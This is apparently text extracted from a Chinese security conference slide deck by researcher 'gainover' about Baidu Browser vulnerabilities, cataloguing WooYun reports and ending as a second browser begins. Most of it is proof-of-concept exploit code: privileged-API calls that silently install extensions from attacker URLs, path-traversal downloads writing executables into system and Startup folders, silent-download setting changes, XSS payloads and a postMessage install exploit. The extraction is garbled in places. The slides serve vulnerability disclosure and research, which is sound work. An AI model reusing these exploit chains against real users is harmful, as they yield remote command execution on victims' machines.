疗一疗本土“瘤”览器 @gainover 乱涂鸦，幼儿园水平。 喜欢各种脚本语言。 脚本小子一枚。 ID:  gainover 喜欢各种球类活动， 但不怎么运动。 热爱大自然，但不怎 么外出。 Dota，20+的1分英雄。 来自乌云的称 呼: 主治：不孕不育、风湿、类风湿、关节炎、皮肤顽症 ….   阵容：由 PKAV  医疗团队成员轮流坐诊！   第一位患者：“百度浏览器” 病例编号：WooYun-­‐2014-­‐080158 诊断结果：插件安装à命令执行 特权API：   静默安装插件 特权域：   h:p://xapp.baidu.com/ window.external.StartRequest(222,"AppS ervice.AppMarket.DownloadPack","(func Von(id,res){alert(res)})","{\"ID\":\"Silenter \",\"UPDATE\":\"true\",\"URL\":\"h:p:// x.com/swf_collector.crx\"}",window,""); Xss  Auditor拦截 特权域XSS：   h:p://xapp.baidu.com/browserextension/ single/sinaweibo/ auth.php#access_token=<img  src=1   onerror=alert(1)> ]p://  会采用IE模式打开   ]p://192.168.1.107/test/ bdbrowser.htm 病例编号：WooYun-­‐2014-­‐80438 特权域：   h:p://xapp.baidu.com/   bdbrowser://   file://   data:   blob: 诊断结果：文件下载写入à命令执行 window.external.StartRequest(1," bdbrowser.skin.download","(funcVon(id,res) {console.log(res)})","{\"name\": \"1/../../../../../../../../../../../../../cmd.exe\", \"url\":\"hLp://192.168.1.105/testbaidu.exe \"}",window,"") var  data='<script>执行特权命令</script>';   var  blob=new  Blob([data],{"type":"text/html"});   (funcVon(){                var  iframe=document.createElement("iframe");                  iframe.src=URL.createObjectURL(blob);                  document.body.appendChild(iframe);   })() 病例编号：WooYun-­‐2014-­‐80910 诊断结果：文件下载写入à命令执行 window.external.StartRequest(1,"bdbrowser.skin.d ownload","(funcVon(id,res) {console.log(res)})","{\"name\": \"1//..//..//..//..//..//..//..//test.js\",\"url\": \"hLp://xapp.baidu.com/interface/ lib.get_app_list_new?callback=恶意JS代码 \"}",window,"") ]p://  会采用IE模式打开   ]p://192.168.1.107/test/ bdbrowser2.htm 特权域：   h:p://xapp.baidu.com/   bdbrowser://   file://   data:   blob: File协议下的XSS：UNC  path   \\127.0.0.1/C$/Program  Files/baidu/baiduBrowser/resource/ extension/security/safe_default.html#path=aa<script/ defer>eval(window.name);</script>     var  obj  =  queryHash(decodeURIComponent(locaVon.hash).replace("#",   ""));   document.getElementById("path").innerHTML  =  obj.path; 病例编号：WooYun-­‐2014-­‐80910 诊断结果：插件安装à命令执行 特权API：   静默安装插件 特权域：   h:p://xapp.baidu.com/ URL跳转 window.external.StartRequest(222,"AppS ervice.AppMarket.DownloadPack","(func Von(id,res){alert(res)})","{\"ID\":\"Silenter \",\"UPDATE\":\"false\",\"URL\": \"h:p://newsleLer.baidu.com/u.html? xxxxxxx&.crx\"}",window,""); 特权域XSS：   h:p://xapp.baidu.com/browserextension/ single/Veba/Vebarslidebar/v_6-­‐0/ Vebaslidebar-­‐login-­‐confirm.html#! f=aaaa&uid=vvvvv&uname=<img  src=1   onerror=alert(1)> 病例编号：WooYun-­‐2014-­‐83294 诊断结果：文件下载写入à命令执行 特权API：设置静默下载 特权URL：   data:text/html,biduwebdata h:p:// window.external.StartRequest(1058," set_string_pref","","[\"download_def ault_directory\",\""+dir+"\"]");     window.external.StartRequest(1059," set_boolean_pref","","[\"download_a uto_save\",true]"); 特权URL  XSS：     file:///C:/xxxxxx#"><img/ src="1"/onerror="alert(1)">   res:///C:/xxxxxx#"><img/src="1"/ onerror="alert(1)"> 病例编号：WooYun-­‐2015-­‐93620 诊断结果：文件下载写入à命令执行 特权API：设置静默下载 特权域：     h:p://liulanqi.baidu.com/   h:p://bbs.liulanqi.baidu.com/ window.external.StartRequest(1058," set_string_pref","","[\"download_def ault_directory\",\""+dir+"\"]");     window.external.StartRequest(1059," set_boolean_pref","","[\"download_a uto_save\",true]"); 特权域XSS：存储型DOM  XSS     [url=h:p://pan.baidu.com/s/1dDgZov3?frm=fujian#%7B%22surl%22%3A %22s%2F1dDgZov3%3Ffrm%3Dfujian%22%2C%22sdate %22%3A1422007684%2C%22sname%22%3A%22<img  src   onerror=console.log(111111)>logo.png%22%2C%22isdir%22%3A0%2C %22uk%22%3A%222600757472%22%2C%22uname%22%3A%22abc %22%7D]百度云附件：logo.png[/url] 病例编号：WooYun-­‐2015-­‐96413 诊断结果：文件解压写入à命令执行 解压时未考虑名称包含 ../ h:p://bbs.liulanqi.baidu.com/ 特权域：   h:p://chajian.baidu.com/app-­‐ res.html ../../../../../../../../../Documents  and   Se|ngs/All  Users/「开始」菜单/程序/ 启动/calc.exe 特权域下的特权功能暴露： var  f=document.createElement("iframe");f.src="h:p://chajian.baidu.com/app-­‐ res.html";   f.onload=funcVon(){   f.contentWindow.postMessage('{"type":"install","data": {"id":"fpdnjdlbdmifoocedhkighhlbchbiikl","url":"h:p://dlsw.br.baidu.com/app/ 201410/1f457685544a52b101cc1f173adae6f8.crx","ext_url":"hLp://xsst.sinaapp.com/ poc/bd2.zip"}}','*');   };   document.body.appendChild(f); 第二位患者：“傲游浏览器” 病例编号：WooYun